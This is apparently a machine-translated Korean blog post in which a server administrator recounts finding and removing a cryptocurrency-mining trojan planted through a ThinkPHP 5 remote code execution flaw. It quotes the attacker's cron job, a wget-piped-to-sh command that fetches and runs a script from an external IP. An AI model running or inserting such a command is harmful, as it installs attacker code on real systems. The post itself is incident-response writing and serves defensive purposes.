트로이 목마 제거 경험: thinkphp5 원격 코드 실행 취약점을 악용한 트로이 목마 처리

다음 튜토리얼 칼럼인 thinkphp에서는 thinkphp5 원격 코드 실행 취약점을 악용하는 트로이 목마에 대처하는 방법을 소개하겠습니다. 도움이 필요한 친구들에게 도움이 되길 바랍니다!

트로이 목마 제거 경험 기억하기: thinkphp5 원격 코드 실행 취약점을 악용한 트로이 목마 처리하기

어제 서버가 갑자기 느려진 것을 발견했습니다. Top은 여러 프로세스가 100% 이상을 사용하고 있음을 보여주었습니다. CPU

다음 명령을 실행하세요:

/tmp/php  -s /tmp/p2.conf

해킹된 것이 거의 확실합니다

다음 단계는 소스를 확인하는 것입니다

마지막에는 로그인 기록이 없습니다

이러한 프로세스를 먼저 종료하지만 몇 시간 후에 다시 나타납니다. 분

먼저 이 트로이 목마가 무엇을 하려는지 살펴보겠습니다

netstat 이 트로이 목마가 포트를 열고 외국 IP와 연결을 맺는 것을 봤습니다

그런데 tcpdump는 한동안 어떤 데이터 전송도 찾지 못했습니다

그가 원하는 것은 무엇이었나요? 할?

로그를 계속 확인해 보세요

크론 로그에서 www 사용자가 crontab 타이밍 작업을 하고 있는 것을 발견했는데, 이것이 기본적으로 문제입니다

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1

몇 가지 질문을 다운받아 살펴보니 마이닝 트로이 목마 프로그램임에 틀림없습니다

Server 웹사이트의 www 사용자는 lnmp를 설치하여 생성되었습니다. 소스를 보면 웹 취약점일 수 있습니다.

다시 보니 /tmp 아래의 php 권한은 www입니다.

lnmp 아래 여러 사이트의 로그를 확인해 보니 최근 thinkphp 5에서 노출된 원격 코드 실행 취약점이 악용된 것을 발견할 수 있습니다.

취약점 세부정보: https:/ /nosec.org/home/detail/2050.html

문제를 수리하고 해결하세요

하지만 이 사이트는 테스트 사이트이고 포트 수신 대기는 8083입니다. 이제 해커가 색다른 포트를 스니핑할 수 있을까요?

출처: https://www.simapple.com/425.html

관련 추천: 최신 10개 thinkphp 비디오 튜토리얼

위 내용은 트로이 목마 제거 경험: thinkphp5 원격 코드 실행 취약점을 악용한 트로이 목마 처리의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!